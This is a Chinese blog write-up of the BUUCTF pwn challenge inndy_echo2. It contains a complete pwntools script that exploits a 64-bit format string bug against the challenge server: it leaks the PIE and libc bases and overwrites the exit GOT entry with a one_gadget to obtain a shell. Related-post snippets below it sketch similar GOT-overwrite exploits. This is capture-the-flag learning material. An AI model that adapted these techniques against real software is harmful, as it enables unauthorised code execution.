inndy_echo2

最新推荐文章于 2023-05-25 22:24:47 发布
最新推荐文章于 2023-05-25 22:24:47 发布
阅读量657 收藏
点赞数 2
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123741996
版权

inndy_echo2

查看保护
在这里插入图片描述
在这里插入图片描述
64位下的格式化漏洞,泄露出基址,再泄露出libc。改exit为one_gadget,exit退出就会getshell。
pwndbg运行至printf这里看一下stack就可以发现41和43可以拿到两个地址,再算出one_gadget。这里笔者进行格式化漏洞攻击的时候选定的是ljust(16, b'\x00') + exit_addr。exit_addr。刚好exit_addr放在了偏移为8。分开写,两个字节两个字节写。

from pwn import *
from time import sleep

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29463)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

p1 = '%41$p'
r.sendline(p1)

r.recvuntil('0x')
base_addr = int(r.recv(14), 16) - 0xa03
success('base_addr = ' + hex(base_addr))

p2 = '%43$p'
r.sendline(p2)

r.recvuntil('0x')
__libc_start_main = int(r.recv(14), 16) - 205
success('__libc_start_main = ' + hex(__libc_start_main))

libc = ELF('libc-2.23.so')
libc_base = __libc_start_main - libc.sym['__libc_start_main']
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = libc_base + one[0]

exit_addr = base_addr + elf.got['exit']

one1 = one_gadget & 0xffff
one2 = (one_gadget >> 16) & 0xffff
one3 = (one_gadget >> 32) & 0xffff

payload = (b'%' + bytes(str(one1), encoding='utf-8') + b'c%8$hn').ljust(16, b'a') + p64(exit_addr)
r.sendline(payload)
sleep(0.5)

payload = (b'%' + bytes(str(one2), encoding='utf-8') + b'c%8$hn').ljust(16, b'a') + p64(exit_addr+2)
r.sendline(payload)
sleep(0.5)

payload = (b'%' + bytes(str(one3), encoding='utf-8') + b'c%8$hn').ljust(16, b'a') + p64(exit_addr + 4)
r.sendline(payload)
sleep(0.5)

r.sendline('exit')

r.interactive()
z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
uart_echo.rar_Echo Echo_amr
09-14
2. **AMR编解码库**:项目可能包含了AMR编解码的库函数,这些函数用于将接收到的AMR音频数据解码为PCM(脉冲编码调制)格式,或者将PCM数据编码为AMR格式。 3. **回声消除算法**:为了实现回声消除,代码可能包含了...
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1491
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
[BUUCTF-pwn]——inndy_echo
Y_peak的博客
03-29 515
[BUUCTF-pwn]——inndy_echo 有gets函数但是没有办法栈溢出,不过幸好有格式化字符串漏洞。 从旁边我们可以找到system的plt以及printf的got, 将system的plt地址写入printf的got。然后输入"/bin/sh"就可以了。 先找找偏移 7 exploit from pwn import * p = remote("node3.buuoj.cn",28268) #p = process("./echo") #gdb.attach(p, "b printf
buuoj Pwn writeup 171-175
yongbaoii的博客
06-09 328
171 wdb_2018_1st_babyheap add edit 只能编辑三次。 show free 简单的uaf。 我们可以通过unlink来泄露地址,劫持free_hook。 要注意的是它自己写的一个输入函数。 要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。 先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。 将h
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 849
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
echoecho2的wp
一个码农的笔记
11-12 5659
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rop和rop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 echo的要求是 nc hackme.inndy.tw 7711 Tips: format string vulnerability这个题目提示了是格式化字符串漏洞,所以先了解一下啥是格式化漏洞,参考 http://www.freeb
uart_echo.rar_Echo Echo
09-23
2. **中断驱动**:为了实现Echo功能,你可以使用中断驱动的方式。当UART检测到数据接收完成时,会产生一个中断请求,然后在中断服务程序中读取并回发数据。 3. **轮询方式**:另一种实现方法是轮询,即定期检查UART...
tcp_echo.rar_tcp_echo
09-19
2. **Unix系统编程** 这个程序是在Unix环境下编写的,Unix系统提供了一系列的系统调用接口,如socket、bind、listen、accept、read、write等,用于进行网络通信。通过这些API,开发者可以构建各种复杂的网络应用。 ...
uart_echo.zip_Echo Echo_echo测试串口_uartecho
09-20
2. **发送数据**:通过编程控制LM4FLaunchpad的UART接口发送一系列已知的数据包。 3. **接收数据**:在同一设备的UART接收端,读取接收到的数据,并与发送的数据进行比较。 4. **数据比较**:如果接收到的数据与...
uart_echo.zip_Echo Echo_lm3s8962_uart_echo
09-23
标题 "uart_echo.zip_Echo Echo_lm3s8962_uart_echo" 提示我们这是一个与UART(通用异步收发传输器)相关的项目,特别是针对LM3S8962微控制器的Echo回显功能。在嵌入式系统中,UART是一种常用的串行通信接口,用于...
inndy_echo
z1r0的博客
01-13 298
inndy_echo 查看保护 格式化字符串漏洞,直接用pwntools里自带的工具将printf改为system即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 29121) else: r = process(file_name) elf =
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 889
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
英招杯pwn1(字符串格式化漏洞
qq_53928256的博客
11-16 310
第二个参数writes示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数改为system函数地址,就写成{printfGOT:systemAddress};可能需要修改8个字节的数据,太麻烦了!即可将puts函数的真实地址泄露出来,即可获得对应的libc版本和基址,方便我们后面的操作;生成随机数代码,通过ctypes包下的cdll来加载libc,这样才能执行libc下的函数。根据地址泄露我们已经能确定对应的libc版本,加载对应的libc,即可获得libc的基址。
BUUCTF(pwn)inndy_echo(32位格式化字符串修改got
半岛铁盒的博客
04-05 403
这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./echo') printf_got=elf.got['printf'] sys=0x8048400 payload=fmtstr_payload(7,{printf_got:sys}) p.sendline(payload) p.sendline('bin/sh') p.interactive() 对...
格式化字符漏洞
IT_huanhuan的博客
05-25 1113
格式化字符串是由普通字符(包括%)和转换规则构成的字符序列。普通字符被原封不动地复制到输出流中。转换规则根据与实参对应的转换指示符对其进行转换,然后将结果写入到输出流中。转换规则由可选的部分和必选部分组成。其中只有转换指示符type是必选部分,用来示转换类型。用 printf() 为例,它的第一个参数就是格式化字符串 :“Color %s,Number %d,Float %4.2f”然后 printf 函数会根据这个格式化字符串来解析对应的其他参数。
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got
mcmuyanga的博客
01-27 2504
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
非栈上的格式化字符串漏洞
Grxer的博客
03-20 748
利用1处栈地址,也就是将0xffffcfa8地址处内容0xffffcfb8修改为0xffffcfac,由于开启pie保护,0xffffcfac处所存内容是elf文件所存地址+pie基址生成的,got也在elf文件的数据区,也是有地址+pie基地址生成,所以我们只需要利用%$hn修改其低四位即可(小端序),buf地址可以利用%$p泄露,这样我们就可以输入buf为printf_got+payload,修改其got为system地址。(目标文件该节在磁盘不占空间,在运行时,内存分配,初始化0))
pwn刷题num15----格式化字符串漏洞
tbsqigongzi的博客
04-22 348
攻防世界pwn进阶区实时数据监测 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO—got仍可写 未开启canary保护—存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 ...
module vlg_echo( input i_clk, input i_rst_n, input i_clk_en, input i_echo, output reg[15:0] o_t_us ); reg[1:0] r_echo; wire pos_echo,neg_echo; reg r_cnt_en; reg[15:0] r_echo_cnt; //对i_echo信号同步处理,获取边沿检测信号,产生计数使能信号r_cnt_en always @(posedge i_clk) if(!i_rst_n) r_echo<= 'b0; else r_echo <= {r_echo[0],i_echo}; assign pos_echo =r_echo[0] & ~r_echo[1] ; assign neg_echo = ~r_echo[0] &r_echo[1] ; always @(posedge i_clk) if(!i_rst_n) r_cnt_en <= 'b0; else if(pos_echo) r_cnt_en <= 'b1; else if(neg_echo) r_cnt_en <= 'b0; else ; //对i_echo信号高脉冲计时,以us为单位 always @(posedge i_clk) if(!i_rst_n) r_echo_cnt <= 'b0; else if(!r_cnt_en) r_echo_cnt <= 'b0; else if(i_clk_en) r_echo_cnt <= r_echo_cnt+1; else ; //对r_echo_cnt计数最大值做锁存 always @(posedge i_clk) if(!i_rst_n) o_t_us <= 'b0; else if(neg_echo) o_t_us <= r_echo_cnt; endmodule
最新发布
06-08
这是一个 Verilog HDL 代码的例子,它包含一个名为 vlg_echo 的模块,其中包括一个输入端口 i_echo,一个时钟信号 i_clk,一个复位信号 i_rst_n,一个时钟使能信号 i_clk_en 和一个输出端口 o_t_us。在模块中定义了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值